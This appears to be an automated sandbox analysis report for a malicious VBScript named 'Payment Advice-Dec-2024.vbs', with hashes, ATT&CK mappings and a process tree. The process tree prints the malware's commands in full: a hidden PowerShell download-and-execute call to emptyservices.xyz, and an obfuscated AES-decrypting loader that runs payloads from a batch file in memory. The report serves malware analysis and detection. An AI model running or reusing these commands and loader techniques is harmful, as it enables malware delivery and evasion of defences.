799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be

General

Target

Payment Advice-Dec-2024.vbs
Size

78KB
MD5

f4360392014f0bebc78d81bbf8b1bfec
SHA1

275ddf9b03cc98e1f0d599140e19c64d5a941fd9
SHA256

799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be
SHA512

bfeded4bf8bd4e82226ec0b3b3abb7dfd9d328ce1216004bdd47bf997f3058a8cf8a5973ef4e01979dbfdb71cc2c9f73a731f70e58eec2106208d7dc08000a79
SSDEEP

1536:xO6AlDEJYMg1Z0BYBOMadTFA63RI3xMpFgLTljdKCHBlok:kblQJYZ1Z2YBLT2mSpFg6iEk

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1620	powershell.exe
2892	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1620	powershell.exe
2892	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2892	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2568 wrote to memory of 1620	2568	WScript.exe	29
PID 2568 wrote to memory of 1620	2568	WScript.exe	29
PID 2568 wrote to memory of 1620	2568	WScript.exe	29
PID 2568 wrote to memory of 2736	2568	WScript.exe	31
PID 2568 wrote to memory of 2736	2568	WScript.exe	31
PID 2568 wrote to memory of 2736	2568	WScript.exe	31
PID 2736 wrote to memory of 1956	2736	cmd.exe	33
PID 2736 wrote to memory of 1956	2736	cmd.exe	33
PID 2736 wrote to memory of 1956	2736	cmd.exe	33
PID 2736 wrote to memory of 2892	2736	cmd.exe	34
PID 2736 wrote to memory of 2892	2736	cmd.exe	34
PID 2736 wrote to memory of 2892	2736	cmd.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice-Dec-2024.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:1956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
67fdaf4f143ad3cdab6f3c542076b194

SHA1
8a7474470f2c47e3f301aef70da5ef415c38cff2

SHA256
f10e4792e78f14998d0334d5d35b5efa825581c917a80e6d8ee096ee714e0c7e

SHA512
64d68d7e8dbad526a2d4d09f4a3ba8b2a28a97a79123ad303c3aea39be8652fc2ad9fdc3f85ddbf68c0713e6186b8219774cd6c46cf90ac3f6a61711b62939e4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e9f108ad764e5c02791c9501369c89ec

SHA1
d86d9dccf0eec14bfa06808e55abc40018482fe4

SHA256
ee95a59856635f6e4745f8b2e14781acdfb41f20ab74edf6044b1ce2548c2946

SHA512
63e24cdc4573a258540e2d773c063d0c691c7496ff25419d7818f46657029dfabe19e5fedcfa23e1a153c4070e9caf6cead32936ad9594d3539fc583c7eb78c0

Download Submit
memory/1620-7-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-8-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-9-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-10-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-11-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-4-0x000007FEF648E000-0x000007FEF648F000-memory.dmp

Filesize
4KB

Download
memory/1620-6-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/1620-5-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/2892-27-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2892-28-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing